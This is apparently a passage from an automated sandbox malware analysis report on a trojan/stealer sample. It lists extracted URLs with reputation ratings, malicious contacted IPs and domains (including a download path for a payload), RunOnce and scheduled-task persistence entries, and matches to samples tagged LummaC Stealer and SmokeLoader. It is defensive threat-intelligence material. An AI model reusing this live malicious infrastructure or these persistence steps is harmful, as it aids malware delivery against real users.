                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1754331572.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://ocsps.ssl.com0?6BC6.exe.1.drfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt06BC6.exe.1.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.BitLockerToGo.exe, 0000000D.00000003.2646882073.0000000004BA5000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2646711159.0000000004BA2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl06BC6.exe.1.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://excel.office.comexplorer.exe, 00000001.00000000.1758099434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://callosallsaospz.shop/lbfBitLockerToGo.exe, 0000000D.00000003.2710589774.0000000002855000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.sajatypeworks.com6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.founder.com.cn/cn/cThe6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiBitLockerToGo.exe, 0000000D.00000003.2646711159.0000000004BA2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1752824604.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 0000000E.00000002.2697335560.0000020F43FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://ocsps.ssl.com0_6BC6.exe.1.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.galapagosdesign.com/DPlease6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.urwpp.deDPlease6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.zhongyicts.com.cn6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name6BC6.exe, 0000000A.00000002.4157872615.0000012B43FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2663864981.0000020F33F51000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://rentry.co6BC6.exe, 0000000A.00000002.4157872615.0000012B44375000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.oberhumer.com6267.exe, 6267.exe.1.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94BitLockerToGo.exe, 0000000D.00000003.2646882073.0000000004BA5000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2646711159.0000000004BA2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1758099434.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1758099434.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000000E.00000002.2663864981.0000020F34382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2663864981.0000020F352BB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://word.office.comexplorer.exe, 00000001.00000000.1758099434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.2663864981.0000020F34177000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000E.00000002.2663864981.0000020F34382000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://store4.gofile.iopowershell.exe, 0000000E.00000002.2663864981.0000020F34177000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2663864981.0000020F3560C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.2663864981.0000020F34177000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://go.micropowershell.exe, 0000000E.00000002.2663864981.0000020F358A7000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1752824604.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 0000000E.00000002.2697335560.0000020F43FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 0000000D.00000003.2604464536.0000000004B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 0000000D.00000003.2643558265.0000000004C1D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaBitLockerToGo.exe, 0000000D.00000003.2646882073.0000000004BA5000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2646711159.0000000004BA2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer06BC6.exe.1.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 0000000D.00000003.2643558265.0000000004C1D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016BitLockerToGo.exe, 0000000D.00000003.2600782433.0000000004B6C000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2601407784.0000000004B65000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.ecosia.org/newtab/BitLockerToGo.exe, 0000000D.00000003.2604464536.0000000004B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 0000000D.00000003.2644960616.0000000004E35000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.2663864981.0000020F34177000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.carterandcone.coml6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/frere-user.html6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1758099434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://support.microsofBitLockerToGo.exe, 0000000D.00000003.2600782433.0000000004B6E000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000E.00000002.2663864981.0000020F34382000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1752824604.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://outlook.com_explorer.exe, 00000001.00000000.1758099434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesBitLockerToGo.exe, 0000000D.00000003.2601407784.0000000004B40000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://callosallsaospz.shop/BitLockerToGo.exe, 0000000D.00000003.2748536287.00000000027FD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2697510339.0000000002855000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2749264887.0000000002858000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2600169746.000000000281F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2677007579.000000000281E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2599449395.00000000027FF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2751394615.00000000027FD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2676850252.0000000002858000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2749166618.0000000002856000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2698739845.000000000285A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2748314851.0000000002855000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2642232685.0000000002808000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2675938074.0000000002851000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2698643151.0000000002856000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2677772639.000000000285A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2642232685.0000000002843000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2676158803.0000000002808000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2710589774.0000000002855000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2752255113.0000000002859000.00000004.00000020.00020000.00000000.sdmptrue
                  • 3%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  		unknown
                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://html4/loose.dtd60FC.exe, 00000008.00000000.2458245557.00007FF7E76E4000.00000008.00000001.01000000.00000007.sdmp, 60FC.exe, 00000008.00000002.2598803226.00007FF7E76F3000.00000008.00000001.01000000.00000007.sdmp, 60FC.exe.1.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fontbureau.com/designersG6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/?6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.founder.com.cn/cn/bThe6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://callosallsaospz.shop/b(fBitLockerToGo.exe, 0000000D.00000003.2676850252.0000000002858000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2675938074.0000000002851000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2677772639.000000000285A000.00000004.00000020.00020000.00000000.sdmptrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.fontbureau.com/designers?6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1752824604.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1758099434.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 0000000E.00000002.2697335560.0000020F43FC1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q6BC6.exe.1.drfalse
                  • URL Reputation: safe
                  		unknown
                  http://ocsps.ssl.com06BC6.exe.1.drfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.tiro.com6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1752824604.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 0000000D.00000003.2604464536.0000000004B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17BitLockerToGo.exe, 0000000D.00000003.2600782433.0000000004B6C000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2601407784.0000000004B65000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.goodfont.co.kr6BC6.exe, 0000000A.00000002.4170823732.0000012B5DA32000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  77.221.157.163
                  		unknownRussian Federation
                  		30968INFOBOX-ASInfoboxruAutonomousSystemRUtrue
                  107.173.160.139
                  		unknownUnited States
                  		36352AS-COLOCROSSINGUStrue
                  104.26.3.16
                  		rentry.coUnited States
                  		13335CLOUDFLARENETUStrue
                  188.114.97.3
                  		callosallsaospz.shopEuropean Union
                  		13335CLOUDFLARENETUStrue
                  107.173.160.137
                  		unknownUnited States
                  		36352AS-COLOCROSSINGUStrue
                  162.0.235.84
                  		funrecipebooks.comCanada
                  		22612NAMECHEAP-NETUStrue
                  167.235.128.153
                  		unknownUnited States
                  		3525ALBERTSONSUStrue
                  185.18.245.58
                  		unknownAzerbaijan
                  		39232UNINETAZtrue
                  187.199.183.102
                  		mzxn.ruMexico
                  		8151UninetSAdeCVMXtrue
                  185.149.100.242
                  		mussangroup.comTurkey
                  		209853VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLitrue
                  64.190.113.113
                  		unknownUnited States
                  		26646TRAVELCLICKCORP1UStrue
                  31.14.70.245
                  		store4.gofile.ioVirgin Islands (BRITISH)
                  		199483LINKER-ASFRfalse

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1483443
                  Start date and time:2024-07-27 14:51:06 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 12m 10s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:19
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@22/21@11/12
                  EGA Information:
                  • Successful, ratio: 75%
                  HCA Information:
                  • Successful, ratio: 70%
                  • Number of executed functions: 46
                  • Number of non-executed functions: 60
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target 60FC.exe, PID 5300 because there are no executed function
                  • Execution Graph export aborted for target powershell.exe, PID 5900 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Report size getting too big, too many NtSetInformationFile calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  08:52:09API Interceptor415292x Sleep call for process: explorer.exe modified
                  08:53:29API Interceptor42x Sleep call for process: powershell.exe modified
                  08:53:30API Interceptor7x Sleep call for process: BitLockerToGo.exe modified
                  13:52:24Task SchedulerRun new task: Firefox Default Browser Agent 3467DD3655FFBCF3 path: C:\Users\user\AppData\Roaming\sbttifb
                  13:54:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#8984_8yUscnjrUY C:\Users\user\AppData\Local\Temp\6267.exe
                  13:54:43AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Update#8984_8yUscnjrUY C:\Users\user\AppData\Local\Temp\6267.exe

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  77.221.157.163FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                  • 77.221.157.163/systemd.exe
                  EA17eA1pkG.exeGet hashmaliciousSmokeLoaderBrowse
                  • 77.221.157.163/systemd.exe
                  e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                  • 77.221.157.163/systemd.exe
                  file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                  • 77.221.157.163/systemd.exe
                  7Y18r(14).exeGet hashmaliciousLummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                  • 77.221.157.163/systemd.exe
                  file.exeGet hashmaliciousSmokeLoaderBrowse
                  • 77.221.157.163/systemd.exe
                  file.exeGet hashmaliciousSmokeLoaderBrowse
                  • 77.221.157.163/systemd.exe
                  file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                  • 77.221.157.163/systemd.exe
                  cOm0MmeV34.exeGet hashmaliciousSmokeLoaderBrowse
                  • 77.221.157.163/systemd.exe
                  8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                  • 77.221.157.163/systemd.exe
                  107.173.160.139FpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                    e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                      file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                        7Y18r(14).exeGet hashmaliciousLummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                          win.exeGet hashmaliciousUnknownBrowse
                            win.exeGet hashmaliciousUnknownBrowse
                              file.exeGet hashmaliciousSmokeLoaderBrowse
                                file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                  cOm0MmeV34.exeGet hashmaliciousSmokeLoaderBrowse
                                    8GJ842Gu9e.exeGet hashmaliciousSmokeLoaderBrowse
                                      104.26.3.16file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                        S982i1J0Uk.msiGet hashmaliciousUnknownBrowse
                                          cliente.exeGet hashmaliciousUnknownBrowse
                                            8998BC9FAF52DAB072698E932593819BFD772EE5C0C4519F30ECD55DE363505A.exeGet hashmaliciousBdaejecBrowse
                                              7Y18r(14).exeGet hashmaliciousLummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                SecuriteInfo.com.Win64.DropperX-gen.26552.421.exeGet hashmaliciousUnknownBrowse
                                                  SecuriteInfo.com.Win64.DropperX-gen.26552.421.exeGet hashmaliciousUnknownBrowse
                                                    TS-240622-Creal2.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                      wzcstatus.exeGet hashmaliciousUnknownBrowse
                                                        wzcsapi.exeGet hashmaliciousXWormBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          rentry.coFpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 104.26.2.16
                                                          e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 104.26.2.16
                                                          file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                          • 104.26.3.16
                                                          allchecker.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                          • 172.67.75.40
                                                          QMe7JpPtde.exeGet hashmaliciousUnknownBrowse
                                                          • 104.26.2.16
                                                          cliente.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.75.40
                                                          S982i1J0Uk.msiGet hashmaliciousUnknownBrowse
                                                          • 104.26.3.16
                                                          cliente.exeGet hashmaliciousUnknownBrowse
                                                          • 104.26.3.16
                                                          8998BC9FAF52DAB072698E932593819BFD772EE5C0C4519F30ECD55DE363505A.exeGet hashmaliciousBdaejecBrowse
                                                          • 104.26.3.16
                                                          7Y18r(14).exeGet hashmaliciousLummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 104.26.3.16
                                                          funrecipebooks.comFpiUD4nYpj.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 162.0.235.84
                                                          e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exeGet hashmaliciousLummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRATBrowse
                                                          • 162.0.235.84
                                                          file.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, SmokeLoaderBrowse
                                                          • 162.0.235.84
